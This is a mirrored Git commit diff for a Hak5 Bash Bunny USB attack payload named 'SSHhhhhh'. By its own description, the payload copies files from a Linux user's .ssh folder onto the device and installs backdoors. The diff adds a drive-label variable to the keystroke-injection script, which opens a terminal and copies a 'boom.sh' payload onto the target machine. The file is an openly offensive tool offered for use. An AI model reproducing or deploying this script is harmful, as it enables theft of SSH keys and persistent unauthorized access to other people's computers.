mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-12-24 14:08:29 +00:00
Update payload.txt
Added BashBunny drive label variable as suggested by @hak5peaks
This commit is contained in:
@@ -1,12 +1,14 @@
|
|||||||
# Title: SSHhhhhh
|
# Title: SSHhhhhh
|
||||||
# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
|
# Description: Exfiltrates files from user's .ssh folder to Bash Bunny via USB & adds backdoors
|
||||||
# Author: WWVB
|
# Author: WWVB
|
||||||
# Props: Hak5Darren
|
# Props: Hak5Darren, hak5peaks
|
||||||
# Version: 1.0
|
# Version: 1.1
|
||||||
# Category: Exfiltration w/Persistence
|
# Category: Exfiltration w/Persistence
|
||||||
# Target: Linux Ubuntu 18.04 LTS
|
# Target: Linux Ubuntu 18.04 LTS
|
||||||
# Attackmodes: HID, Storage
|
# Attackmodes: HID, Storage
|
||||||
|
|
||||||
|
DRIVE_LABEL="BashBunny"
|
||||||
|
|
||||||
#!/bin/bash
|
#!/bin/bash
|
||||||
|
|
||||||
LED SETUP
|
LED SETUP
|
||||||
@@ -19,7 +21,7 @@ QUACK CTRL-ALT t
|
|||||||
QUACK DELAY 100
|
QUACK DELAY 100
|
||||||
|
|
||||||
# Drop primary payload on the box
|
# Drop primary payload on the box
|
||||||
QUACK STRING cp /media/\$USER/BashBunny/payloads/$SWITCH_POSITION/boom.sh .
|
QUACK STRING cp /media/\$USER/$DRIVE_LABEL/payloads/$SWITCH_POSITION/boom.sh .
|
||||||
QUACK ENTER
|
QUACK ENTER
|
||||||
QUACK DELAY 50
|
QUACK DELAY 50
|
||||||
|
|
||||||
|
|||||||
Reference in New Issue
Block a user